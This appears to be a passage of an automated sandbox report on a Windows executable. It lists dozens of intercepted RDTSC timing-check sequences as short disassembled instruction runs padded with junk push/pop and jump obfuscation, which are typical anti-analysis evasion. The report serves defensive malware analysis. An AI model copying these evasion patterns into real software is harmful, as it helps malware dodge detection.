                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C0534A second address: C0535B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C0535B second address: C05363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C04EA0 second address: C04EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C04EA4 second address: C04EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C04EA8 second address: C04EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA5CCB5262Eh 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C04EBE second address: C04EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C0503C second address: C05070 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA5CCB52626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jnl 00007FA5CCB52643h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C08CB5 second address: C08CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C12A94 second address: C12A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C12A9A second address: C12AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C2818F second address: C28194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C27EFF second address: C27F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C3F8F9 second address: C3F8FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C3F8FD second address: C3F91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB7DED5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C3F91D second address: C3F93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007FA5CCB52645h 0x0000000b jmp 00007FA5CCB52631h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C3F93C second address: C3F942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C3FBB4 second address: C3FBB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C3FE70 second address: C3FE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C4029E second address: C402DB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA5CCB52640h 0x00000008 jmp 00007FA5CCB5262Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FA5CCB52628h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C40579 second address: C40590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007FA5CCB7DED2h 0x0000000b jl 00007FA5CCB7DEC6h 0x00000011 jc 00007FA5CCB7DEC6h 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C43388 second address: C4338C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C438C4 second address: C438C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C438C9 second address: C438D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FA5CCB52626h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C438D4 second address: C438E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FA5CCB7DEC8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C438E6 second address: C438EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C438EB second address: C43946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA5CCB7DEC6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov dword ptr [ebp+122DB3ECh], edx 0x00000014 push dword ptr [ebp+122D1FD0h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FA5CCB7DEC8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jl 00007FA5CCB7DECCh 0x0000003a mov edx, dword ptr [ebp+122D3319h] 0x00000040 and edx, dword ptr [ebp+122D33D1h] 0x00000046 push C5BAC5A1h 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FA5CCB7DECAh 0x00000052 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C46321 second address: C4632C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FA5CCB52626h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C4632C second address: C46339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007FA5CCB7DED2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53001B5 second address: 53001DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA5CCB5262Dh 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53001DA second address: 5300239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA5CCB7DECAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007FA5CCB7DED7h 0x00000013 pop eax 0x00000014 mov ecx, edi 0x00000016 popad 0x00000017 mov ecx, edx 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov di, ax 0x00000021 pushfd 0x00000022 jmp 00007FA5CCB7DED4h 0x00000027 add si, A268h 0x0000002c jmp 00007FA5CCB7DECBh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5300239 second address: 5300251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA5CCB52634h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5300251 second address: 5300255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0033 second address: 52F0037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0037 second address: 52F003D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F003D second address: 52F009C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB5262Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA5CCB52636h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FA5CCB52630h 0x00000016 pop ebp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007FA5CCB5262Ch 0x00000020 and esi, 4B0EEAC8h 0x00000026 jmp 00007FA5CCB5262Bh 0x0000002b popfd 0x0000002c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320F27 second address: 5320F43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx eax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FA5CCB7DECAh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov cl, B6h 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320F43 second address: 5320F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320F47 second address: 5320FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FA5CCB7DECFh 0x0000000c sbb ecx, 45D26B2Eh 0x00000012 jmp 00007FA5CCB7DED9h 0x00000017 popfd 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FA5CCB7DED3h 0x00000023 pushfd 0x00000024 jmp 00007FA5CCB7DED8h 0x00000029 jmp 00007FA5CCB7DED5h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C00ED second address: 52C0100 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 01B9862Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov eax, ebx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0100 second address: 52C0104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0104 second address: 52C0163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, 0DA8A8E8h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA5CCB52638h 0x00000015 sbb eax, 450ABB48h 0x0000001b jmp 00007FA5CCB5262Bh 0x00000020 popfd 0x00000021 popad 0x00000022 push dword ptr [ebp+04h] 0x00000025 pushad 0x00000026 mov cx, 5AB7h 0x0000002a popad 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FA5CCB52634h 0x00000037 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0163 second address: 52C0167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0167 second address: 52C016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C016D second address: 52C0174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 8Fh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0D2B second address: 52E0D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA5CCB5262Ah 0x0000000a or cx, 00D8h 0x0000000f jmp 00007FA5CCB5262Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0D4C second address: 52E0D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0D52 second address: 52E0D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0D56 second address: 52E0D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0905 second address: 52E0909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0909 second address: 52E090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0410 second address: 52F041F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB5262Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F041F second address: 52F0443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0443 second address: 52F0447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0447 second address: 52F044B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F044B second address: 52F0451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0451 second address: 52F0478 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA5CCB7DECEh 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0478 second address: 52F04C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA5CCB52631h 0x00000009 and cx, 7646h 0x0000000e jmp 00007FA5CCB52631h 0x00000013 popfd 0x00000014 mov eax, 28CDD8F7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA5CCB52639h 0x00000024 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F04C8 second address: 52F04FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA5CCB7DED8h 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F04FB second address: 52F04FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F04FF second address: 52F0505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0505 second address: 52F050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F050B second address: 52F050F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320E8D second address: 5320E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dl, 83h 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320E9B second address: 5320EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320EA2 second address: 5320EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA5CCB52631h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320EB7 second address: 5320EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320EBB second address: 5320ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320ECB second address: 5320ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320ECF second address: 5320ED5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320ED5 second address: 5320EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5300502 second address: 5300507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5300507 second address: 5300526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DECAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA5CCB7DECEh 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5300526 second address: 5300567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB5262Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA5CCB5262Bh 0x00000013 sbb cx, 771Eh 0x00000018 jmp 00007FA5CCB52639h 0x0000001d popfd 0x0000001e push esi 0x0000001f pop edx 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5300567 second address: 530056D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0738 second address: 52E073C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E073C second address: 52E0742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0742 second address: 52E0789 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB5262Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA5CCB52630h 0x0000000f push eax 0x00000010 jmp 00007FA5CCB5262Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA5CCB52635h 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0789 second address: 52E078F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E078F second address: 52E0793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0793 second address: 52E07DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FA5CCB7DED6h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA5CCB7DED7h 0x0000001a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E07DE second address: 52E07E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E07E4 second address: 52E07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53000F9 second address: 53000FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53000FD second address: 5300103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5300103 second address: 5300109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5300109 second address: 530010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 530010D second address: 5300156 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52634h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FA5CCB5262Bh 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FA5CCB52636h 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov di, 80BEh 0x00000022 popad 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53003BB second address: 53003BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53003BF second address: 53003C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53003C5 second address: 53003EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA5CCB7DECDh 0x00000013 rdtsc
